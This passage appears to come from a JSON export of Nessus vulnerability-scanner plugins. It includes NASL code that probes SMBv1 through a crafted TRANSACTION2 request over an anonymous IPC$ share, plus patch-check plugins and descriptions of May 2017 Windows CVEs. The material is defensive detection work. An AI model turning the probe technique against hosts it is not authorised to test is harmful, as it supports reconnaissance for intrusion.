dlen, slen, pad2; \n\n pad1 = pad2 = NULL;\n\n header = smb_header (Command: SMB_COM_TRANSACTION2,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + 1;\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n if(isnull(plen)) plen = strlen(param); \n dlen = strlen(data);\n slen = strlen(setup);\n\n if(slen % 2) return NULL; \n\n if(isnull(max_pcount)) max_pcount = 0x1000;\n if(isnull(max_dcount)) max_dcount = 0x1000;\n if(isnull(max_scount)) max_scount = 0x20;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:max_scount) + # Max setup count\n raw_byte (b:0) + # Reserved1\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved2\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved3\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = '\\x00' + # Name \n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nsetup = raw_word(w:0x06); \nparam = raw_word(w:0xbeef) + raw_dword(d:0); \nstatus = my_smb_trans2(setup: setup, data: NULL, param:param);\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == 0x00000001) \n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_NOT_SUPPORTED)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n port = kb_smb_transport();\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION2 request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION2 request. Possibly 'NullSessionPipes' and 'NullSessionShares' are not configured on the server.\"); \n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:09:27", "description": "The remote Windows host is missing security update 4019263 or cumulative update 4019264. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0231", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019264.NASL", "href": "https://www.tenable.com/plugins/nessus/100058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100058);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0231\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98110,\n 98111,\n 98127,\n 98173,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019263\");\n script_xref(name:\"MSKB\", value:\"4019264\");\n script_xref(name:\"MSFT\", value:\"MS17-4019263\");\n script_xref(name:\"MSFT\", value:\"MS17-4019264\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019263\nor cumulative update 4019264. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n # https://support.microsoft.com/en-us/help/4019264/windows-7-update-kb4019264\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89dd1a9e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019263 or Cumulative update KB4019264.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft\nbulletin = 'MS17-05';\nkbs = make_list(\"4019264\", \"4019263\");\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Window 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:[4019264, 4019263])\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:10:50", "description": "The remote Windows host is missing security update 4019214 or cumulative update 4019216. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows Server 2012 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0238", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17-MAY_4019214.NASL", "href": "https://www.tenable.com/plugins/nessus/100054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100054);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0238\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98102,\n 98103,\n 98111,\n 98127,\n 98139,\n 98237,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019214\");\n script_xref(name:\"MSKB\", value:\"4019216\");\n script_xref(name:\"MSFT\", value:\"MS17-4019214\");\n script_xref(name:\"MSFT\", value:\"MS17-4019216\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows Server 2012 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019214\nor cumulative update 4019216. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker 